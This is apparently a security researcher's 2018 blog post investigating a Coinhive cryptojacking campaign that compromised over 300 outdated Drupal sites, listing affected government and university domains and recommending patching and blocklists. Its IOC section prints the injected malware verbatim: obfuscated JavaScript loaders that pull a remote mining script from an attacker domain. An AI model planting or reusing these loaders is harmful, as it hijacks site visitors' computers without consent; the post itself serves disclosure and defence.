Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.
#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking. pic.twitter.com/B3rd2Q5uVA
— Bad Packets Report (@bad_packets) May 4, 2018
Similar story here — #Coinhive injected via the same #JavaScript library (jquery.once.js?v=1.2) pointing to http://vuuwd[.]com/t.js
Also an outdated #Drupal installation. pic.twitter.com/fXv2sBsIVB
— Bad Packets Report (@bad_packets) May 5, 2018
Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.
Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.
The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.
After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.
While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. pic.twitter.com/IEeqXrAKTT
— Bad Packets Report (@bad_packets) May 4, 2018
While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd[.]com.
Looking at the historical DNS records on @securitytrails we find https://t.co/nT3NhaZotQ was recently involved in Monero (XMR) mining operations. So it seems fitting to continue the trend with today's cryptojacking incident using #Coinhive. pic.twitter.com/GfmgUy2gWc
— Bad Packets Report (@bad_packets) May 4, 2018
This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.
Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using regular expression via PublicWWW’s snipex function.
Once I had the potential list of affected sites, I began scanning them for IOCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.
The big reveal
After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.
The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon.
Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.
Government sites affected
The National Labor Relations Board – US federal agency
http://www.nlrb.gov
Government of Chihuahua, Mexico
chihuahua.gob.mx
City of Marion, Ohio
http://www.marionohio.us
Arizona Board of Behavioral Health Examiners
azbbhe.us
Social Security Institute of the State of Mexico and Municipalities
issemym.gob.mx
Turkish Revenue Administration – Aydın Tax Office
aydinvdb.gov.tr
Procalidad – “The Project Improvement of Higher Education Quality” – Peru
procalidad.gob.pe
Matzikama Municipality
http://www.matzikamamun.co.za
UMBRIA Special Reconstruction Office
http://www.sismaumbria2016.it
University / school sites affected
University of Aleppo
alepuniv.edu.sy
College of Biblical Studies
cbshouston.edu
IOHANES – University of Balamand
iohanes.balamand.edu.lb
Ringling College of Art and Design
http://www.ringling.edu
Vidyalankar Institute of Technology
vit.edu.in
University of Batangas
ub.edu.ph
Asia Pacific Institute of Information Technology (APIIT)
http://www.apiit.edu.my
Management Development Institute of Singapore in Tashkent
mdis.uz
Islamic Azad University of the Semnan branch
http://www.semnaniau.ac.ir
Tan Dan Secondary School
thcstttandan.edu.vn
Other sites affected
The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.
2018-05-07 update
Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.
.@UCLA Atmospheric & Oceanic Sciences website is also affected by this #cryptojacking campaign. pic.twitter.com/TmJu1IMGpr
— Bad Packets Report (@bad_packets) May 7, 2018
Websites of UCLA and DLink Brazil were also found injecting Coinhive.
For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.
So you've managed to compromise the website of a US federal agency, but you didn't use a trusted SSL cert for delivering your payload. Because of this, the connection to your server is blocked and #Coinhive fails to load. pic.twitter.com/cq5gqVupQy
— Bad Packets Report (@bad_packets) May 6, 2018
In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness of this cryptojacking campaign as Coinhive does not load.
Another compromised federal government website has been found in this #cryptojacking campaign. This time it's the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC). Fortunately, Coinhive fails to load because payload is not injected via HTTPS. pic.twitter.com/2Ow95vASyt
— Bad Packets Report (@bad_packets) May 7, 2018
2018-05-16 update
This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.
The malware host in the Drupal #cryptojacking campaign is back online. #PRTG shows access was restored to vuuwd[.]com around 5:00 PM UTC today. pic.twitter.com/tUScqE5kz0
— Bad Packets Report (@bad_packets) May 16, 2018
The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story
IOCs
http://vuuwd[.]com/t.js
https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")
162.222.213.236
var RqLm1=window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0];var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x74x79x70x65"]='x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74';D2["x69x64"]='x6dx5fx67x5fx61';D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';RqLm1["x61x70x70x65x6ex64x43x68x69x6cx64"](D2);
var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);
;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();
KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6
Closing Remarks
We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.
To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.
If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.
If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets
Also, be sure to check out my Mirai-like botnet data website!
Thanks guys!
Implemented:
https://discourse.pi-hole.net/t/adding-cryptojacking-campaign-drupal-sites-to-main-blocklist/9439/4
Cheers,
deHakkelaar.